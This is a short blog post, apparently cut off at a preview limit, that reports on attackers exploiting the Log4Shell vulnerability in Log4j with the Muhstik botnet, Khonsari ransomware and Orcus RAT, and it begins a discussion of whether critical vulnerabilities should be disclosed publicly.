Threat Actors Are Weaponizing the Log4j Vulnerability

The Ramifications of Public Vulnerability Disclosure

Alex Rodriguez
3 min readDec 16, 2021

--

Hello, World! Recent cyber news headlines regarding a critical vulnerability in the popular Java-based logging library, Log4j, dubbed Log4Shell, has, as expected, resulted in the quick development of malware that exploits the vulnerability. In this blog, I’ll talk about some of the recent and ongoing cyber incidents involving the exploitation of vulnerable Log4j applications and also give my opinion on whether or not critical vulnerabilities should be publicly disclosed or kept confidential between relevant parties. With that out of the way, let’s get started by talking about some of the malware that has already been seen exploiting vulnerable Log4j applications.

Threat Actors At Work

Threat actors have been deploying malware that exploits applications running a vulnerable version (2.0–2.14.1) of Log4j. According to a recent blog by Check Point, more than 44% of corporate networks have already been targeted by adversaries probing for the vulnerable library. Malware, such as cryptojackers and ransomware, has already infected many organizations globally. According to evidence gathered by Bitdefender, threat actors behind the Muhstik botnet are attempting to exploit vulnerable applications in massive numbers, as is expected from a botnet, since its purpose is to compromise as many hosts as possible, without considering the target. Additionally, a new ransomware family called Khonsari, has also been spotted attempting to compromise Linux servers, as well as attackers that are leveraging the vulnerability to download the Orcus Remote Access Trojan. So should we disclose critical vulnerabilities to the public as soon as they are discovered? Read the next section to read my answer to the question.

Public Disclosure of Critical Vulnerabilities

Whether or not disclosing critical vulnerabilities, such as Log4Shell, is the right thing to do, is still a topic of debate in the cyber community. There are organizations that believe it is the right move to publicly reveal the existence of vulnerabilities to ensure that impacted organizations are aware of the risks and can address them. However, other organizations have…

--

--

Alex Rodriguez

Written by Alex Rodriguez

1.7K Followers

I am an Offensive Security Engineer @ Amazon who writes about cybersecurity and anything related to technology. Opinions are my own.

More from Alex Rodriguez

See all from Alex Rodriguez

Recommended from Medium

Lists

See more recommendations

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams